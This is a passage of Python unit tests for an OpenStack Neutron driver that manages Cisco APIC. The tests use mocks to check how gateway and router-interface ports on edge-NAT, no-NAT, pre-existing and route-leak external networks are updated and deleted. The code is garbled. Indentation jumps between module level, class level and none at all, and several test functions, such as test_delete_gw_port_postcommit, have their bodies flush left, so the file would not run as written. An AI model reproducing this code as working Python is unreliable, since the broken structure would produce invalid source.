            mgr.associate_external_epg_to_nat_epg.assert_called_once_with(
                bd_tenant, leak_l3out, leak_ext_epg,
                leak_epg_name, target_owner=bd_tenant,
                app_profile_name=self._app_profile(),
                transaction=mock.ANY)
        else:
            # Without route leak the BD keeps the router VRF context and
            # leak external EPGs are created on both candidate l3outs.
            mgr.set_context_for_bd.assert_called_once_with(
                bd_tenant, bd_name,
                self._routed_network_vrf_name(tenant=net_tenant),
                transaction=mock.ANY)
            expected_calls = [
                mock.call(leak_l3out, subnet='5.5.5.0/24',
                          external_epg=leak_ext_epg,
                          owner=bd_tenant, transaction=mock.ANY),
                mock.call(leak_l3out1, subnet='5.5.5.0/24',
                          external_epg=leak_ext_epg,
                          owner=bd_tenant, transaction=mock.ANY)]
            self._check_call_list(
                expected_calls,
                mgr.ensure_external_epg_created.call_args_list)
    mgr.set_l3out_for_bd.assert_called_once_with(
        bd_tenant, bd_name, l3out_name,
        transaction=mock.ANY)
def test_update_edge_nat_interface_port_postcommit(self):
    """Edge-NAT interface update, default tenant, no route leak."""
    self._test_update_interface_port_postcommit()

def test_update_route_leak_edge_nat_interface_port_postcommit(self):
    """Edge-NAT interface update with route leak enabled."""
    self._test_update_interface_port_postcommit(route_leak=True)

def test_update_cross_tenant_edge_nat_interface_port_postcommit(self):
    """Edge-NAT interface update with networks in another tenant."""
    self._test_update_interface_port_postcommit('another')

def test_update_route_leak_cross_tenant_edge_nat_interface_port_postcommit(
        self):
    """Edge-NAT interface update, route leak, cross-tenant networks."""
    self._test_update_interface_port_postcommit('another', route_leak=True)

def test_update_no_nat_interface_port_postcommit(self):
    """No-NAT interface update, default tenant."""
    self._test_update_interface_port_postcommit(no_nat=True)

def test_update_cross_tenant_no_nat_interface_port_postcommit(self):
    """No-NAT interface update with networks in another tenant."""
    self._test_update_interface_port_postcommit(no_nat=True,
                                                net_tenant='another')

def test_update_pre_no_nat_interface_port_postcommit(self):
    """No-NAT interface update against a pre-existing l3out."""
    self._test_update_interface_port_postcommit(no_nat=True, pre=True)

def test_update_cross_tenant_pre_no_nat_interface_port_postcommit(self):
    """No-NAT interface update, pre-existing l3out, cross-tenant."""
    self._test_update_interface_port_postcommit(
        no_nat=True, pre=True, net_tenant='another')
def _test_update_pre_edge_nat_gw_port_postcommit(
        self, net_tenant=mocked.APIC_TENANT):
    """Gateway-port update on a pre-existing edge-NAT external network.

    The driver must clone the pre-existing l3out by posting the trimmed
    l3extOut template (instead of creating a managed external routed
    network), reserve an encap VLAN, plug the router contract into the
    "Auto-" external EPGs, and link the tenant BD to the new l3out.

    :param net_tenant: tenant owning the external network; pass a
        different tenant to exercise the cross-tenant path.
    """
    net_ctx = self._get_network_context(net_tenant,
                                        mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                        TEST_SEGMENT1, external=True)
    port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                      mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                      'vm1', net_ctx, HOST_ID1, gw=True)
    mgr = self.driver.apic_manager
    mgr.get_router_contract.return_value = mocked.FakeDbContract(
        mocked.APIC_CONTRACT)
    self.driver.l3out_vlan_alloc.reserve_vlan = mock.Mock()
    self.driver._query_l3out_info = mock.Mock()
    self.driver._query_l3out_info.return_value = {
        'l3out_tenant': 'bar_tenant',
        'vrf_name': 'bar_ctx',
        'vrf_tenant': 'bar_tenant',
        # fake l3out response from APIC for testing purpose only
        'l3out': ([
            {u'l3extExtEncapAllocator': {}},
            {u'l3extInstP': {}},
            {u'l3extRtBDToOut': {}},
            {u'l3extRsOutToBDPublicSubnetHolder': {}},
            {u'l3extRsNdIfPol': {u'tDn': u'', u'tnNdIfPolName': u''}},
            {u'l3extRsDampeningPol': {u'tDn': u'',
                                      u'tnRtctrlProfileName': u''}},
            {u'ospfRsIfPol': {u'tDn': u'', u'tnOspfIfPolName': u''}},
            {u'l3extRsEngressQosDppPol': {u'tDn': u'',
                                          u'tnQosDppPolName': u''}},
            {u'bfdRsIfPol': {u'tDn': u'', u'tnBfdIfPolName': u''}},
            {u'bgpRsPeerPfxPol': {u'tDn': u'',
                                  u'tnBgpPeerPfxPolName': u''}},
            {u'eigrpRsIfPol': {u'tDn': u'', u'tnEigrpIfPolName': u''}},
            {u'l3extLNodeP': {
                u'attributes': {
                    u'dn': (u'uni/tn-bar_tenant/out-network_pre_edge'
                            u'_nat-name/lnodep-Leaf3-4_NP'),
                    u'lcOwn': u'local',
                    u'name': u'Leaf3-4_NP',
                    u'targetDscp': u'unspecified',
                    u'configIssues': u'',
                    u'stateQual': u'', u'tCl': u'',
                    u'tContextDn': u'', u'tRn': u'',
                    u'type': u'', u'rType': u'',
                    u'state': u'', u'forceResolve': u'',
                    u'tag': u'yellow-green',
                    u'monPolDn': u'', u'modTs': u'',
                    u'uid': u'15374',
                    u'encap': u'unknown',
                    u'addr': u'0.0.0.0'},
                u'children': [{u'l3extLIfP': {u'children': [
                    {u'l3extRsPathL3OutAtt': {u'attributes': {
                        u'encap': u'vlan-3101',
                        u'ifInstT': u'sub-interface'}}}]}}]}},
            {u'l3extRsEctx': {u'attributes': {
                u'dn': (u'uni/tn-bar_tenant/out-network_pre_edge_nat'
                        u'-name/rsectx'),
                u'tDn': u'', u'tnFvCtxName': u'default'}}}])}

    def echo1(obj):
        # Render APIC managed-object names as plain strings so the
        # substituted l3out body can be compared textually.
        return str(obj)
    self.driver.apic_manager.apic.fvTenant.rn = echo1
    self.driver.apic_manager.apic.l3extOut.rn = echo1
    self.driver.apic_manager.apic.fvCtx.name = echo1
    self.driver.l3out_vlan_alloc.reserve_vlan.return_value = 999
    manager.NeutronManager = mock.MagicMock()
    manager.NeutronManager.get_plugin().get_networks.return_value = [
        {'tenant_id': mocked.APIC_TENANT,
         'name': mocked.APIC_NETWORK,
         'id': u'net_id'}]
    self.driver.update_port_postcommit(port_ctx)
    mgr.get_router_contract.assert_called_once_with(
        self._scoped_name(port_ctx.current['device_id']),
        owner=self._router_tenant())
    self.driver.l3out_vlan_alloc.reserve_vlan.assert_called_once_with(
        mocked.APIC_NETWORK_PRE_EDGE_NAT + '-name',
        self._routed_network_vrf_name(), self._tenant(ext_nat=True))
    # BUG FIX: this previously read 'mgr.mgr.ensure_external_routed_
    # network_created.called'; 'mgr.mgr' is an auto-created child Mock
    # whose '.called' is always False, so the assertion was vacuous.
    # Assert on the real manager method: the pre-existing l3out is
    # cloned via post_body (checked below), not created via this API.
    self.assertFalse(mgr.ensure_external_routed_network_created.called)
    self.assertFalse(mgr.set_domain_for_external_routed_network.called)
    self.assertFalse(mgr.ensure_logical_node_profile_created.called)
    self.assertFalse(mgr.ensure_static_route_created.called)
    vrf_pfx = ('%s-' % mocked.APIC_ROUTER
               if self.driver.vrf_per_router_tenants else '')
    l3out_name = (self.driver.per_tenant_context and
                  self._scoped_name(vrf_pfx +
                                    mocked.APIC_NETWORK_PRE_EDGE_NAT) or
                  mocked.APIC_NETWORK_PRE_EDGE_NAT)
    l3out_name = "Auto-%s" % l3out_name
    # The expected request is the trimmed l3out template with the
    # 'Sub' placeholders substituted for the target l3out/tenant/VRF.
    final_req = re.sub('Auto-Sub',
                       l3out_name, self.trimmed_l3out)
    final_req = re.sub('tn-Sub',
                       "tn-%s" % self._tenant(ext_nat=True), final_req)
    final_req = re.sub('ctx-Sub',
                       "%s" % self._routed_network_vrf_name(), final_req)
    mgr.apic.post_body.assert_called_once_with(
        mgr.apic.l3extOut.mo, final_req, self._tenant(ext_nat=True),
        l3out_name)
    expected_calls = [
        mock.call(
            l3out_name, subnet='5.5.5.0/24',
            external_epg="Auto-%s" % self._scoped_name(
                mocked.APIC_EXT_EPG, preexisting=True),
            owner=self._tenant(ext_nat=True), transaction=mock.ANY),
        mock.call(
            l3out_name, subnet='6.6.6.0/24',
            external_epg="Auto-%s" % self._scoped_name(
                mocked.APIC_EXT_EPG, preexisting=True),
            owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls, mgr.ensure_external_epg_created.call_args_list)
    mgr.set_l3out_for_bd.assert_called_once_with(
        self._tenant(), self._scoped_name('net_id'), l3out_name,
        transaction=mock.ANY)
    expected_calls = [
        mock.call(
            l3out_name,
            mgr.get_router_contract.return_value,
            external_epg="Auto-%s" % self._scoped_name(mocked.APIC_EXT_EPG,
                                                       preexisting=True),
            owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls,
        mgr.ensure_external_epg_consumed_contract.call_args_list)
    expected_calls = [
        mock.call(
            l3out_name,
            mgr.get_router_contract.return_value,
            external_epg="Auto-%s" % self._scoped_name(mocked.APIC_EXT_EPG,
                                                       preexisting=True),
            owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls,
        mgr.ensure_external_epg_provided_contract.call_args_list)
def test_update_pre_edge_nat_gw_port_postcommit(self):
    """Pre-existing edge-NAT gateway update, default tenant."""
    self._test_update_pre_edge_nat_gw_port_postcommit()

def test_update_cross_tenant_pre_edge_nat_gw_port_postcommit(self):
    """Pre-existing edge-NAT gateway update, external net in another
    tenant."""
    self._test_update_pre_edge_nat_gw_port_postcommit('admin_tenant')
    def _test_update_pre_gw_port_postcommit(self,
                                            net_tenant=mocked.APIC_TENANT):
        """Gateway-port update on a pre-existing (NAT-ed) external network.

        Checks that the driver creates a shadow ("Shd-") L3Out owned by the
        NAT tenant, wires the router contract into its external EPGs, and
        does not touch node profiles / static routes / domains (those belong
        to the pre-existing L3Out).
        """
        net_ctx = self._get_network_context(net_tenant,
                                            mocked.APIC_NETWORK_PRE,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_PRE,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        # Pretend the pre-existing L3Out was found on APIC in 'bar_tenant'.
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant',
            'vrf_name': 'bar_ctx',
            'vrf_tenant': 'bar_tenant'}
        self.driver.update_port_postcommit(port_ctx)
        mgr.get_router_contract.assert_called_once_with(
            self._scoped_name(port_ctx.current['device_id']),
            owner=self._router_tenant())
        # Expected shadow L3Out name (router-prefixed when VRF-per-router).
        vrf_pfx = ('%s-' % mocked.APIC_ROUTER
                   if self.driver.vrf_per_router_tenants else '')
        shd_l3out = (self.driver.per_tenant_context and
                     self._scoped_name(vrf_pfx + mocked.APIC_NETWORK_PRE) or
                     mocked.APIC_NETWORK_PRE)
        expected_calls = [
            mock.call("Shd-%s" % shd_l3out,
                      owner=self._tenant(ext_nat=True), transaction=mock.ANY,
                      context=self._routed_network_vrf_name())]
        self._check_call_list(
            expected_calls,
            mgr.ensure_external_routed_network_created.call_args_list)
        self.assertFalse(mgr.set_domain_for_external_routed_network.called)
        self.assertFalse(mgr.ensure_logical_node_profile_created.called)
        self.assertFalse(mgr.ensure_static_route_created.called)
        expected_calls = [
            mock.call(
                "Shd-%s" % shd_l3out, subnet='5.5.5.0/24',
                external_epg="Shd-%s" % self._scoped_name(
                    mocked.APIC_EXT_EPG, preexisting=True),
                owner=self._tenant(ext_nat=True), transaction=mock.ANY),
            mock.call(
                "Shd-%s" % shd_l3out, subnet='6.6.6.0/24',
                external_epg="Shd-%s" % self._scoped_name(
                    mocked.APIC_EXT_EPG, preexisting=True),
                owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
        self._check_call_list(
            expected_calls, mgr.ensure_external_epg_created.call_args_list)
        expected_calls = [
            mock.call(
                "Shd-%s" % shd_l3out,
                mgr.get_router_contract.return_value,
                external_epg="Shd-%s" % self._scoped_name(mocked.APIC_EXT_EPG,
                                                          preexisting=True),
                owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.ensure_external_epg_consumed_contract.call_args_list)
        expected_calls = [
            mock.call(
                "Shd-%s" % shd_l3out,
                mgr.get_router_contract.return_value,
                external_epg="Shd-%s" % self._scoped_name(mocked.APIC_EXT_EPG,
                                                          preexisting=True),
                owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.ensure_external_epg_provided_contract.call_args_list)
    def test_update_pre_gw_port_postcommit(self):
        """Same-tenant variant of the pre-existing gw-port update test."""
        self._test_update_pre_gw_port_postcommit()
    def test_update_cross_tenant_pre_gw_port_postcommit(self):
        """Cross-tenant variant: the external network lives in 'admin_tenant'."""
        self._test_update_pre_gw_port_postcommit('admin_tenant')
    def _test_update_pre_no_nat_gw_port_postcommit(self, l3out_tenant):
        """Gateway-port update on a pre-existing external net with NAT off.

        With 'enable_nat' disabled, no shadow L3Out is created; instead the
        pre-existing L3Out is re-pointed at the routed VRF, the router
        contract is attached to its external EPG, and every tenant BD is
        linked to the L3Out.
        """
        self.external_network_dict[mocked.APIC_NETWORK_PRE + '-name'][
            'enable_nat'] = 'False'
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_PRE,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_PRE,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        ctx_name = self._network_vrf_name(
            nat_vrf=False, net_name=self._scoped_name(net_ctx.current['id']))
        # Pre-existing L3Out is reported under the tenant being tested.
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': l3out_tenant,
            'vrf_name': ctx_name,
            'vrf_tenant': self._tenant(vrf=True)}
        nets = [
            {'tenant_id': mocked.APIC_TENANT + '1',
             'name': mocked.APIC_NETWORK,
             'id': 'net_id1'},
            {'tenant_id': mocked.APIC_TENANT + '2',
             'name': mocked.APIC_NETWORK,
             'id': 'net_id2'}]
        manager.NeutronManager = mock.MagicMock()
        manager.NeutronManager.get_plugin().get_networks.return_value = nets
        self.driver.update_port_postcommit(port_ctx)
        mgr.get_router_contract.assert_called_once_with(
            self._scoped_name(port_ctx.current['device_id']),
            owner=self._router_tenant())
        # No-NAT: nothing new is created on APIC.
        self.assertFalse(mgr.ensure_external_routed_network_created.called)
        self.assertFalse(mgr.ensure_external_epg_created.called)
        l3out_name = self._scoped_name(net_ctx.current['name'],
                                       preexisting=True)
        mgr.set_context_for_external_routed_network.assert_called_once_with(
            l3out_tenant, l3out_name, self._routed_network_vrf_name(),
            transaction=mock.ANY)
        expected_calls = [
            mock.call(
                l3out_name,
                mgr.get_router_contract.return_value,
                external_epg=self._scoped_name(mocked.APIC_EXT_EPG,
                                               preexisting=True),
                owner=l3out_tenant, transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.ensure_external_epg_consumed_contract.call_args_list)
        expected_calls = [
            mock.call(
                l3out_name, mgr.get_router_contract.return_value,
                external_epg=self._scoped_name(mocked.APIC_EXT_EPG,
                                               preexisting=True),
                owner=l3out_tenant, transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.ensure_external_epg_provided_contract.call_args_list)
        self.assertFalse(mgr.set_contract_for_epg.called)
        # Each network's BD must be attached to the pre-existing L3Out.
        expected_l3out_bd_calls = [
            mock.call(self._tenant(neutron_tenant=n['tenant_id']),
                      self._scoped_name(n['id'], tenant=n['tenant_id']),
                      l3out_name,
                      transaction=mock.ANY)
            for n in nets]
        self._check_call_list(expected_l3out_bd_calls,
                              mgr.set_l3out_for_bd.call_args_list)
    def test_update_pre_no_nat_gw_port_postcommit_tenant(self):
        """No-NAT gw-port update when the L3Out is in the test tenant."""
        self._test_update_pre_no_nat_gw_port_postcommit(self._tenant())
    def test_update_pre_no_nat_gw_port_postcommit_common(self):
        """No-NAT gw-port update when the L3Out is in tenant 'common'."""
        self._test_update_pre_no_nat_gw_port_postcommit('common')
def test_delete_gw_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1, gw=True)
self.driver._delete_path_if_last = mock.Mock()
self.driver.delete_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
mgr.delete_external_routed_network.assert_called_once_with(
"Shd-%s" % (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx + mocked.APIC_NETWORK) or
mocked.APIC_NETWORK),
owner=self._tenant(ext_nat=True))
def test_delete_gw_port_postcommit_empty_tenant(self):
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': mocked.APIC_ROUTER, 'tenant_id': ''})
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1, external=True)
r_cnst = n_constants.DEVICE_OWNER_ROUTER_GW
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
mocked.APIC_ROUTER,
net_ctx, HOST_ID1, gw=True,
device_owner=r_cnst)
self.driver.delete_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
mgr.delete_external_routed_network.assert_not_called()
    def test_delete_edge_nat_gw_port_postcommit(self):
        """Deleting an edge-NAT gw port removes the "Auto-" L3Out.

        Also verifies the L3Out VLAN is released and the L3Out is detached
        from the tenant network's BD.
        """
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_EDGE_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_EDGE_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        self.driver._delete_path_if_last = mock.Mock()
        self.driver.l3out_vlan_alloc.release_vlan = mock.Mock()
        manager.NeutronManager = mock.MagicMock()
        manager.NeutronManager.get_plugin().get_networks.return_value = [
            {'tenant_id': mocked.APIC_TENANT,
             'name': mocked.APIC_NETWORK,
             'id': 'net_id'}]
        self.driver.delete_port_postcommit(port_ctx)
        mgr = self.driver.apic_manager
        # Expected auto-created L3Out name (router-prefixed when
        # VRF-per-router is enabled).
        vrf_pfx = ('%s-' % mocked.APIC_ROUTER
                   if self.driver.vrf_per_router_tenants else '')
        l3out_name = (self.driver.per_tenant_context and
                      self._scoped_name(vrf_pfx + mocked.APIC_NETWORK_EDGE_NAT)
                      or mocked.APIC_NETWORK_EDGE_NAT)
        l3out_name = "Auto-%s" % l3out_name
        mgr.delete_external_routed_network.assert_called_once_with(
            l3out_name, owner=self._tenant(ext_nat=True))
        self.driver.l3out_vlan_alloc.release_vlan.assert_called_once_with(
            mocked.APIC_NETWORK_EDGE_NAT + '-name',
            self._routed_network_vrf_name(),
            self._tenant(ext_nat=True))
        bd_name = self._scoped_name('net_id')
        mgr.unset_l3out_for_bd.assert_called_once_with(
            self._tenant(), bd_name, l3out_name, transaction=mock.ANY)
    def test_delete_pre_edge_nat_gw_port_postcommit(self):
        """Same as the edge-NAT gw-port delete, on a pre-existing L3Out."""
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        self.driver._delete_path_if_last = mock.Mock()
        self.driver.l3out_vlan_alloc.release_vlan = mock.Mock()
        manager.NeutronManager = mock.MagicMock()
        manager.NeutronManager.get_plugin().get_networks.return_value = [
            {'tenant_id': mocked.APIC_TENANT,
             'name': mocked.APIC_NETWORK,
             'id': 'net_id'}]
        self.driver.delete_port_postcommit(port_ctx)
        mgr = self.driver.apic_manager
        vrf_pfx = ('%s-' % mocked.APIC_ROUTER
                   if self.driver.vrf_per_router_tenants else '')
        l3out_name = (self.driver.per_tenant_context and
                      self._scoped_name(vrf_pfx +
                                        mocked.APIC_NETWORK_PRE_EDGE_NAT) or
                      mocked.APIC_NETWORK_PRE_EDGE_NAT)
        l3out_name = "Auto-%s" % l3out_name
        mgr.delete_external_routed_network.assert_called_once_with(
            l3out_name, owner=self._tenant(ext_nat=True))
        self.driver.l3out_vlan_alloc.release_vlan.assert_called_once_with(
            mocked.APIC_NETWORK_PRE_EDGE_NAT + '-name',
            self._routed_network_vrf_name(), self._tenant(ext_nat=True))
        bd_name = self._scoped_name('net_id')
        mgr.unset_l3out_for_bd.assert_called_once_with(
            self._tenant(), bd_name, l3out_name, transaction=mock.ANY)
    def _test_delete_interface_port_postcommit(self, route_leak=False):
        """Deleting a router-interface port cleans up edge-NAT artifacts.

        With `route_leak` the router uses a routing context and the driver
        must remove the "Leak-" EPG/BD plus the leaked external EPG;
        otherwise it removes the leaked routes from the "Leak-" L3Outs.
        In both cases the BD is detached from the "Auto-" L3Out and
        re-pointed at the network VRF.
        """
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            'net_id',
                                            TEST_SEGMENT1,
                                            route_leak=route_leak)
        net_ctx1 = self._get_network_context(mocked.APIC_TENANT,
                                             'net_id1',
                                             TEST_SEGMENT1,
                                             route_leak=route_leak)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          'net_id',
                                          'vm1', net_ctx, HOST_ID1,
                                          interface=True)
        if route_leak:
            self.driver._l3_plugin.get_router = mock.Mock(
                return_value={'id': 'some_id',
                              'name': mocked.APIC_ROUTER + '-name',
                              'tenant_id': mocked.APIC_TENANT,
                              'apic:use_routing_context': mocked.APIC_ROUTER,
                              'external_gateway_info':
                              {'network_id': mocked.APIC_NETWORK_EDGE_NAT,
                               'external_fixed_ips': []}})
        else:
            self.driver._l3_plugin.get_router = mock.Mock(
                return_value={'id': mocked.APIC_ROUTER,
                              'name': mocked.APIC_ROUTER + '-name',
                              'tenant_id': mocked.APIC_TENANT,
                              'external_gateway_info':
                              {'network_id': mocked.APIC_NETWORK_EDGE_NAT,
                               'external_fixed_ips': []}})
        port_ctx._plugin.get_network = mock.Mock(
            return_value={'name': mocked.APIC_NETWORK_EDGE_NAT + '-name',
                          'router:external': True})
        self.driver._get_route_leak_networks = mock.Mock(
            return_value=([net_ctx.current, net_ctx1.current]))
        port_ctx._plugin.get_subnets = mock.Mock(
            return_value=[{'tenant_id': mocked.APIC_TENANT,
                           'id': 'some_id',
                           'cidr': '5.5.5.0/24'}])
        self.driver.delete_port_postcommit(port_ctx)
        prefix = ('%s-' % mocked.APIC_ROUTER
                  if self.driver.vrf_per_router_tenants else '')
        l3out_name = (self.driver.per_tenant_context and
                      self._scoped_name(prefix + mocked.APIC_NETWORK_EDGE_NAT)
                      or mocked.APIC_NETWORK_EDGE_NAT)
        l3out_name = "Auto-%s" % l3out_name
        bd_name = self._scoped_name('net_id')
        mgr = self.driver.apic_manager
        mgr.unset_l3out_for_bd.assert_called_once_with(
            self._tenant(), bd_name, l3out_name, transaction=mock.ANY)
        if self.driver.vrf_per_router_tenants:
            leak_l3out = 'Leak-%s' % net_ctx.current['name']
            leak_l3out1 = 'Leak-%s' % net_ctx1.current['name']
            leak_ext_epg = 'Leak-%s-%s' % (mocked.APIC_ROUTER + '-name',
                                           mocked.APIC_EXT_EPG)
            if route_leak:
                leak_epg_name = 'Leak-%s-%s' % (mocked.APIC_ROUTER, 'net_id')
                mgr.delete_epg_for_network.assert_called_once_with(
                    self._tenant(), leak_epg_name,
                    app_profile_name=self._app_profile(),
                    transaction=mock.ANY)
                leak_bd_name = 'Leak-%s-%s' % (mocked.APIC_ROUTER, bd_name)
                mgr.delete_bd_on_apic.assert_called_once_with(
                    self._tenant(), leak_bd_name, transaction=mock.ANY)
                mgr.ensure_external_epg_deleted.assert_called_once_with(
                    leak_l3out, external_epg=leak_ext_epg,
                    owner=self._tenant(), transaction=mock.ANY)
            else:
                expected_calls = [
                    mock.call(leak_l3out, subnets=['5.5.5.0/24'],
                              external_epg=leak_ext_epg,
                              owner=self._tenant(), transaction=mock.ANY),
                    mock.call(leak_l3out1, subnets=['5.5.5.0/24'],
                              external_epg=leak_ext_epg,
                              owner=self._tenant(), transaction=mock.ANY)]
                self._check_call_list(
                    expected_calls,
                    mgr.ensure_external_epg_routes_deleted.call_args_list)
            # NOTE(review): this line *calls* the mock instead of asserting
            # on it (no assert_* method), so it verifies nothing — it was
            # presumably meant to be
            # mgr.ensure_context_deleted.assert_called_once_with(...).
            # TODO confirm the driver's actual call before fixing.
            mgr.ensure_context_deleted(
                owner=self._tenant(),
                ctx_id=self._routed_network_vrf_name(),
                transaction=mock.ANY)
            mgr.set_context_for_bd.assert_called_once_with(
                self._tenant(), bd_name, self._network_vrf_name(),
                transaction=mock.ANY)
    def test_delete_edge_nat_interface_port_postcommit(self):
        """Interface-port delete on edge-NAT without route leaking."""
        self._test_delete_interface_port_postcommit()
    def test_delete_route_leak_edge_nat_interface_port_postcommit(self):
        """Interface-port delete on edge-NAT with route leaking enabled."""
        self._test_delete_interface_port_postcommit(route_leak=True)
    def test_update_no_nat_gw_port_postcommit(self):
        """Gateway-port update on a no-NAT external network.

        The driver re-points the existing L3Out at the routed VRF, attaches
        the router contract to its external EPG and links every tenant BD
        to the L3Out; no shadow objects are created.
        """
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_NO_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_NO_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        nets = [
            {'tenant_id': mocked.APIC_TENANT + '1',
             'name': mocked.APIC_NETWORK,
             'id': 'net_id1'},
            {'tenant_id': mocked.APIC_TENANT + '2',
             'name': mocked.APIC_NETWORK,
             'id': 'net_id2'}]
        manager.NeutronManager = mock.MagicMock()
        manager.NeutronManager.get_plugin().get_networks.return_value = nets
        self.driver.update_port_postcommit(port_ctx)
        l3out_name = self._scoped_name(mocked.APIC_NETWORK_NO_NAT)
        mgr.get_router_contract.assert_called_once_with(
            self._scoped_name(port_ctx.current['device_id']),
            owner=self._router_tenant())
        mgr.set_context_for_external_routed_network.assert_called_once_with(
            self._tenant(), l3out_name,
            self._routed_network_vrf_name(),
            transaction=mock.ANY)
        mgr.ensure_external_epg_consumed_contract.assert_called_once_with(
            l3out_name,
            mgr.get_router_contract.return_value,
            external_epg=mocked.APIC_EXT_EPG, transaction=mock.ANY,
            owner=self._tenant())
        mgr.ensure_external_epg_provided_contract.assert_called_once_with(
            l3out_name,
            mgr.get_router_contract.return_value,
            external_epg=mocked.APIC_EXT_EPG, transaction=mock.ANY,
            owner=self._tenant())
        self.assertFalse(mgr.set_contract_for_epg.called)
        # Every network's BD must be attached to the no-NAT L3Out.
        expected_l3out_bd_calls = [
            mock.call(self._tenant(neutron_tenant=n['tenant_id']),
                      self._scoped_name(n['id'], tenant=n['tenant_id']),
                      l3out_name,
                      transaction=mock.ANY)
            for n in nets]
        self._check_call_list(expected_l3out_bd_calls,
                              mgr.set_l3out_for_bd.call_args_list)
def test_delete_unrelated_gw_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
'unrelated',
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
'unrelated',
'vm1', net_ctx, HOST_ID1, gw=True)
self.driver._delete_path_if_last = mock.Mock()
self.driver.delete_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
self.assertFalse(mgr.delete_external_epg_contract.called)
    def test_delete_pre_gw_port_postcommit(self):
        """Deleting a gw port on a pre-existing net removes the shadow L3Out."""
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_PRE,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_PRE,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        self.driver._delete_path_if_last = mock.Mock()
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant'}
        self.driver.delete_port_postcommit(port_ctx)
        vrf_pfx = ('%s-' % mocked.APIC_ROUTER
                   if self.driver.vrf_per_router_tenants else '')
        mgr.delete_external_routed_network.assert_called_once_with(
            "Shd-%s" % (self.driver.per_tenant_context and
                        self._scoped_name(vrf_pfx + mocked.APIC_NETWORK_PRE) or
                        mocked.APIC_NETWORK_PRE),
            owner=self._tenant(ext_nat=True))
    def _test_delete_no_nat_gw_port_postcommit(self, pre):
        """Deleting a gw port on a no-NAT network detaches VRF and contracts.

        :param pre: when True, mark the network as pre-existing and expect
            contract unset calls on the pre-existing L3Out; otherwise expect
            the driver-managed contract deletion path. In both cases the
            L3Out itself survives and all BDs are detached from it.
        """
        if pre:
            self.external_network_dict[mocked.APIC_NETWORK_NO_NAT + '-name'][
                'preexisting'] = 'True'
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_NO_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_NO_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        self.driver._delete_path_if_last = mock.Mock()
        mgr = self.driver.apic_manager
